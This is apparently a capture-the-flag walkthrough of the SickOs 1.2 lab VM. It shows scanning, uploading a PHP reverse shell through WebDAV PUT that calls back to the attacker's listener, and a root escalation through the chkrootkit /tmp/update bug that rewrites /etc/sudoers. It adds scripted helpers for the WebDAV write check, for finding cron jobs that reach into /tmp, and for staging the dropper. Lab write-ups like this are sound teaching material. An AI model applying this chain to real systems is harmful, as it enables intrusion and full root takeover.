Environment:
Name: SickOs: 1.2
Date: 27 May 2016
Author: D4rk
Series: SickOs
Description:
This is the second VM in the SickOs series and is independent of the previous one; the scope of the challenge is to obtain the highest privilege on the system.
Information gathering
Finding the target
$ netdiscover -r 192.168.123.1/24
192.168.123.87 08:00:27:df:16:3b 1 60 PCS Systemtechnik GmbH
Port scan
$ nmap -A -p- 192.168.123.87
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 09:17 CST
Nmap scan report for ubuntu.lan (192.168.123.87)
Host is up (0.00097s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.31 seconds
Directory enumeration
$ dirb http://192.168.123.87/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 6 09:23:18 2019
URL_BASE: http://192.168.123.87/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.123.87/ ----
+ http://192.168.123.87/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.123.87/test/
---- Entering directory: http://192.168.123.87/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Sep 6 09:23:20 2019
DOWNLOADED: 4612 - FOUND: 1
Vulnerability scan
$ nikto -h http://192.168.123.87/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.123.87
+ Target Hostname: 192.168.123.87
+ Target Port: 80
+ Start Time: 2019-09-06 09:23:30 (GMT8)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.28
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ 26545 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2019-09-06 09:24:43 (GMT8) (73 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Code audit
view-source:http://192.168.123.87/test/
The source of the /test/ directory listing adds nothing beyond the server version in its footer:
<div class="foot">lighttpd/1.4.28</div>
Exploitation
First, check Exploit-DB for the lighttpd version identified above:
$ searchsploit lighttpd
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Lighttpd 1.4.15 - Multiple Code Execut | exploits/windows/remote/30322.rb
Lighttpd 1.4.16 - FastCGI Header Overf | exploits/multiple/remote/4391.c
Lighttpd 1.4.17 - FastCGI Header Overf | exploits/linux/remote/4437.c
Lighttpd 1.4.x - mod_userdir Informati | exploits/linux/remote/31396.txt
Lighttpd < 1.4.23 (BSD/Solaris) - Sour | exploits/multiple/remote/8786.txt
lighttpd - Denial of Service (PoC) | exploits/linux/dos/18295.txt
lighttpd 1.4.31 - Denial of Service (P | exploits/linux/dos/22902.sh
lighttpd 1.4/1.5 - Slow Request Handli | exploits/linux/dos/33591.sh
--------------------------------------- ----------------------------------------
Shellcodes: No Result
- Nothing here fits: the code-execution entries target 1.4.15 to 1.4.17 and the rest are denial-of-service or information-disclosure PoCs, so none of them gets us a shell on 1.4.28. The next thing to check is the server's configuration rather than its version: an OPTIONS request shows which methods the /test/ directory accepts.
$ curl -v -X OPTIONS http://192.168.123.87/test/
* Trying 192.168.123.87:80...
* TCP_NODELAY set
* Connected to 192.168.123.87 (192.168.123.87) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.123.87
> User-Agent: curl/7.65.3
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Fri, 06 Sep 2019 09:37:08 GMT
< Server: lighttpd/1.4.28
The response advertises WebDAV (DAV: 1,2) on /test/ and lists PUT among the allowed methods, so an unauthenticated client can write files into a directory that the server hands to PHP.
Uploading a shell
The shell is pentestmonkey's php-reverse-shell.php with its $ip and $port set to the attacking machine (192.168.123.160, port 443); the upload is an HTTP/1.0 PUT:
$ curl --upload-file php-reverse-shell.php -v --url http://192.168.123.87/test/icekam.php -0 --http1.0
* Trying 192.168.123.87:80...
* TCP_NODELAY set
* Connected to 192.168.123.87 (192.168.123.87) port 80 (#0)
> PUT /test/icekam.php HTTP/1.0
> Host: 192.168.123.87
> User-Agent: curl/7.65.3
> Accept: */*
> Content-Length: 5496
>
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-Length: 0
< Connection: close
< Date: Fri, 06 Sep 2019 09:50:26 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0
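The two curl commands above are the manual version of a check worth scripting. As an added example that is not part of the original write-up, these shell functions parse the OPTIONS response for the advertised methods, upload a marker file with an HTTP/1.0 PUT as the working command above did, read it back, and delete it. The use of curl, the marker file name and the function names are assumptions of this example.

```shell
# Added example, not from the original write-up: a repeatable WebDAV write
# check built from the OPTIONS and PUT requests shown above.
# Assumes curl is installed; the directory URL (e.g. http://192.168.123.87/test/)
# is supplied by the caller and the marker name is this script's own choice.

# Print the union of all Allow: header values from raw HTTP response headers
# on stdin, one method per line, deduplicated. lighttpd sends two Allow: lines.
dav_allowed_methods() {
  tr -d '\r' \
    | awk -F': ' 'tolower($1) == "allow" { print $2 }' \
    | tr ',' '\n' | tr -d ' ' | grep -v '^$' | sort -u
}

# Exit 0 when the header text on stdin advertises METHOD (exact match).
dav_allows() {
  dav_allowed_methods | grep -qx "$1"
}

# Send OPTIONS and dump only the response headers to stdout.
dav_options() {
  curl -s -o /dev/null -D - -X OPTIONS "$1"
}

# End-to-end check: OPTIONS -> PUT a marker -> GET it back -> DELETE it.
# Exits 0 only when the directory accepts the upload AND serves it back;
# a 2xx on PUT alone does not prove the file landed where you can reach it.
dav_write_check() {
  base="${1%/}/"                        # normalise to one trailing slash
  marker="davcheck-$$.txt"              # unlikely to collide with real content
  tmp=$(mktemp)
  printf 'dav-write-check %s\n' "$$" > "$tmp"

  if ! dav_options "$base" | dav_allows PUT; then
    echo "PUT not advertised for $base" >&2; rm -f "$tmp"; return 1
  fi

  # --http1.0 because that is the request form that succeeded above.
  code=$(curl -s -o /dev/null -w '%{http_code}' --http1.0 \
              --upload-file "$tmp" "$base$marker")
  rm -f "$tmp"
  case "$code" in
    200|201|204) ;;
    *) echo "PUT $base$marker returned HTTP $code" >&2; return 1 ;;
  esac

  if ! curl -s "$base$marker" | grep -q "dav-write-check $$"; then
    echo "uploaded file is not served back from $base$marker" >&2; return 1
  fi

  curl -s -o /dev/null -X DELETE "$base$marker"   # clean up the marker
  echo "writable: $base (PUT accepted and content served back)"
}

# Usage: dav_write_check http://192.168.123.87/test/
```

Run it as `dav_write_check http://192.168.123.87/test/`. Reading the marker back matters: a server can answer 200 to a PUT and still store the file somewhere it never serves, which is the same reason the upload above was confirmed by fetching icekam.php rather than by trusting the PUT status.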
$ sudo nc -lvvp 443
$ curl "http://192.168.123.87/test/icekam.php"
listening on [any] 443 ...
connect to [192.168.123.160] from ubuntu.lan [192.168.123.87] 52529
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
02:52:48 up 17:41, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
Privilege escalation
System information
$ cd /tmp
$ ls -la
total 8
drwxrwxrwt 2 root root 4096 Sep 6 02:54 .
drwxr-xr-x 22 root root 4096 Mar 30 2016 ..
srwxr-xr-x 1 www-data www-data 0 Sep 5 09:11 php.socket-0
$ uname -a
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/tmp$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 12.04.4 LTS
Release: 12.04
Codename: precise
Pull LinEnum onto the attacking machine and serve it over HTTP so the target can fetch it:
$ git clone https://github.com/rebootuser/LinEnum.git
Cloning into 'LinEnum'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 187 (delta 3), reused 0 (delta 0), pack-reused 178
Receiving objects: 100% (187/187), 125.76 KiB | 270.00 KiB/s, done.
Resolving deltas: 100% (91/91), done.
## icekam @ Sec in /tmp [10:08:09]
$ cd LinEnum
## icekam @ Sec in /tmp/LinEnum on git:master o [10:08:11]
$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Among LinEnum's findings on the target, the cron entries stand out: a root-owned /etc/crontab, and a chkrootkit script in one of the /etc/cron* run-parts directories:
-rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab
www-data@ubuntu:/tmp$ ls -lah /etc/cron* 2>/dev/null | grep chkrootkit
ls -lah /etc/cron* 2>/dev/null | grep chkrootkit
-rwxr-xr-x 1 root root 2.0K Jun 4 2014 chkrootkit
crontab
The cron job is usable: chkrootkit runs from cron as root, and chkrootkit 0.49 and earlier (chkrootkit -V shows the installed version) has a bug in its slapper() check, CVE-2014-0476, that executes a file named /tmp/update, if one exists, with root's privileges. So we create that file with a payload that grants www-data passwordless sudo, make it executable, and wait for the scheduled run to trigger it:
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update
Two things to check before relying on this: the file must be executable, because chkrootkit runs it directly rather than feeding it to a shell, and /tmp/update must not already exist, because the sticky bit on /tmp stops www-data from replacing a file it does not own. sudo refuses to run at all while /etc/sudoers is world-writable, so the chain only works if the final chmod 440 restores the mode. Once the job has fired, sudo -s from the www-data shell gives root without a password.
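As an added example, not part of the original write-up, the following shell functions generalise the cron step above. cron_tmp_refs walks the cron job files and, one level down, the scripts they call, flagging any reference to a path under a world-writable directory; the scan follows invoked scripts because the Debian cron wrapper /etc/cron.daily/chkrootkit only calls /usr/sbin/chkrootkit, and the ${ROOTDIR}tmp/update line lives in the latter. path_claimable checks that a flagged path can actually be created by the current user, and stage_dropper writes the payload with the execute bit set and refuses to overwrite. Function names, arguments and the usage comments are this example's own assumptions.

```shell
# Added example, not from the original write-up: enumerate cron-driven
# scripts that touch world-writable locations, then stage a payload file
# without clobbering anything. Assumes a POSIX shell with grep -E, sed,
# head -c and chmod; function names and arguments are this example's own.

# Print "file:line:text" for every reference in FILE to a path under /tmp,
# /var/tmp or /dev/shm, including chkrootkit's ${ROOTDIR}tmp/... spelling.
tmp_refs() {
  grep -nE '(/|\$\{?ROOTDIR\}?)(tmp|var/tmp|dev/shm)/' "$1" | sed "s|^|$1:|"
  return 0
}

# Print the absolute paths mentioned in FILE that exist, are executable and
# are scripts (start with "#!"): the programs a cron wrapper hands off to,
# e.g. /etc/cron.daily/chkrootkit calling /usr/sbin/chkrootkit. Compiled
# binaries are skipped because grep -n would only say "Binary file matches".
invoked_programs() {
  grep -oE '/[A-Za-z0-9_./-]+' "$1" | sort -u | while read -r p; do
    if [ -f "$p" ] && [ -x "$p" ] && [ "$(head -c 2 "$p" 2>/dev/null)" = '#!' ]; then
      echo "$p"
    fi
  done
  return 0
}

# Walk crontab, cron.d and the run-parts directories under CRON_ROOT
# (default /etc), scanning each job file and, one level down, the scripts
# it invokes. Paths containing whitespace are not handled.
cron_tmp_refs() {
  cron_root="${1:-/etc}"
  for f in "$cron_root"/crontab "$cron_root"/cron.d/* \
           "$cron_root"/cron.hourly/* "$cron_root"/cron.daily/* \
           "$cron_root"/cron.weekly/* "$cron_root"/cron.monthly/*; do
    [ -f "$f" ] || continue
    tmp_refs "$f"
    for p in $(invoked_programs "$f"); do tmp_refs "$p"; done
  done
  return 0
}

# Can the current user create PATH? True when it does not exist yet and its
# parent directory is writable. In sticky /tmp a file owned by someone else
# cannot be removed or replaced, so "exists" means the trick will not work.
path_claimable() {
  [ ! -e "$1" ] && [ -w "$(dirname "$1")" ]
}

# Write BODY as an executable /bin/sh script at PATH. Refuses to overwrite.
stage_dropper() {
  path="$1"; body="$2"
  if ! path_claimable "$path"; then
    echo "cannot claim $path" >&2; return 1
  fi
  printf '#!/bin/sh\n%s\n' "$body" > "$path" && chmod 755 "$path"
}

# Usage on the target:
#   cron_tmp_refs /etc     # lists the ${ROOTDIR}tmp/update line from /usr/sbin/chkrootkit
#   stage_dropper /tmp/update 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers'
```

On the target, `cron_tmp_refs /etc` is the quick way to see which root cron jobs reach into /tmp, and `path_claimable /tmp/update` tells you before you write anything whether someone, or an earlier attempt, has already claimed the file.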
Takeaways
A slick technique; the heart of it is privilege escalation through a scheduled task.